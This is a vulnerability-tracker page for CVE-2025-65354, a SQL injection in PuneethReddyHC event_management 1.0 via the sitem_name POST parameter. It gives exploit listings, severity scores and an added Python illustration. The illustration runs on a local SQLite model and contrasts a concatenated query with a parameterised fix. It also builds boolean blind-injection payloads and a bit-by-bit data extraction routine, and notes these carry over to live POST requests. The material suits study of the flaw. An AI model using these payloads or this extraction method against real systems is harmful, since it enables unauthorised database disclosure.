CVE-2025-65354

CRITICAL

PuneethReddyHC event_management 1.0 - SQL Injection via sitem_name POST Parameter

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2025-65354, with PoCs published by amaansiddd787 and EarthAngel666.

AI-analyzed exploit summary

This repository contains a writeup detailing a SQL injection vulnerability (CVE-2025-65354) in the PuneethReddyHC event-management application v1.0. The vulnerability allows remote, unauthenticated attackers to manipulate SQL queries via the `sitem_name` POST parameter.

Description

Improper input handling in /Grocery/search_products_itname.php in PuneethReddyHC event-management 1.0 permits SQL injection via the sitem_name POST parameter. Crafted payloads can alter query logic and disclose database contents; exploitation may result in sensitive data disclosure and backend compromise.

Exploits (2)

nomisec · WRITEUP · 1 star
by amaansiddd787 · poc
https://github.com/amaansiddd787/CVE-2025-65354
Classification
Writeup 90%
Attack Type
Sqli
Complexity
Trivial
Reliability
Reliable
Target: PuneethReddyHC event-management v1.0
No auth needed
Prerequisites: Access to the vulnerable endpoint /Grocery/search_products_itname.php
devstral-2 · analyzed Feb 16, 2026
nomisec · WORKING POC
by EarthAngel666 · poc
https://github.com/EarthAngel666/CVE-2025-65354

This PoC demonstrates a SQL injection vulnerability in a web application by sending crafted HTTP requests carrying SQL payloads. It tests for boolean-based blind SQLi by comparing responses to true and false conditions. Note that this summary describes the payloads as being sent in HTTP headers, whereas the advisory identifies the injection point as the sitem_name POST body parameter; verify the actual injection vector against the PoC source before relying on it.

Classification
Working Poc 80%
Attack Type
Sqli
Complexity
Trivial
Reliability
Reliable
Target: Unknown (Grocery/search_products_itname.php endpoint)
No auth needed
Prerequisites: Network access to the target endpoint · Python environment with requests library
devstral-2 · analyzed Feb 16, 2026
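The Description above states that the sitem_name value is spliced into a query, and the EarthAngel666 PoC summary describes detecting that with a boolean-based blind differential. The block below is an added illustration written for this page, not code from the advisory, from either PoC repository, or from the event_management project. The query shape (a `LIKE '%...%'` search over a products table), the SQLite backing store, the sample rows and the function names are all assumptions standing in for the real /Grocery/search_products_itname.php handler, whose source and database engine the page does not show. It models the vulnerable concatenation beside a parameterised fix, runs the true/false oracle check against both, and shows how the same oracle leaks database contents (here, a row count) one bit at a time.

```python
import sqlite3

# Constructed sample rows standing in for the application's product table (assumption).
SAMPLE_PRODUCTS = [("Rice", 45.0), ("Sugar", 38.5), ("Salt", 12.0), ("Tea", 90.0)]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, item_name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (item_name, price) VALUES (?, ?)", SAMPLE_PRODUCTS)
    return conn


def search_vulnerable(conn, sitem_name):
    """Hypothetical model of the CWE-89 pattern: the POST value is concatenated into SQL text."""
    sql = "SELECT item_name, price FROM products WHERE item_name LIKE '%" + sitem_name + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, sitem_name):
    """Same search with a bound parameter: the input can only ever be a LIKE pattern."""
    sql = "SELECT item_name, price FROM products WHERE item_name LIKE ?"
    return conn.execute(sql, ("%" + sitem_name + "%",)).fetchall()


def condition_payload(base, condition):
    """Build a sitem_name value that injects `condition` into the assumed query shape.

    The application appends "%'" after the value, so the payload ends with an
    unterminated string '1%' that the application itself closes: the query becomes
    ... LIKE '%base%' AND (condition) AND '1%'='1%', which keeps the SQL well formed.
    """
    return base + "%' AND (" + condition + ") AND '1%'='1"


def is_injectable(search, conn, base="Rice"):
    """Boolean-based blind differential: a true condition must reproduce the baseline
    result set and a false one must change it. Returns True if that holds."""
    baseline = search(conn, base)
    true_rows = search(conn, condition_payload(base, "1=1"))
    false_rows = search(conn, condition_payload(base, "1=2"))
    return bool(baseline) and true_rows == baseline and false_rows != true_rows


def oracle(search, conn, condition, base="Rice"):
    """One yes/no question to the database: True when the injected condition held."""
    return search(conn, condition_payload(base, condition)) == search(conn, base)


def blind_row_count(search, conn, hi=1024):
    """Recover the product row count through the oracle by binary search
    (about log2(hi) requests). Returns 0 when the oracle never answers True,
    which is what the parameterised version yields."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(search, conn, f"(SELECT count(*) FROM products) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated query", search_vulnerable), ("bound parameter", search_fixed)):
        print(f"{name}: injectable={is_injectable(fn, db)} leaked_row_count={blind_row_count(fn, db)}")
```

Against a live target the two `search` calls become POST requests to the endpoint and the comparison is made on the response body; the oracle logic and the bit-by-bit extraction are otherwise the same, which is why the SSVC entry below rates the flaw as automatable.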

References (1)

Core References (1)
Exploit, Third Party Advisory: https://github.com/amaansiddd787/CVE-2025-65354

Scores

CVSS v3.1 9.8 (Critical)
CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector NETWORK
EPSS 0.0048 (0.48% predicted probability of exploitation in the next 30 days)
EPSS Percentile 37.2%

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact total

Details

CWE
CWE-89
Status published
Products (1)
puneethreddyhc/event_management 1.0
Published Dec 23, 2025
Tracked Since Feb 18, 2026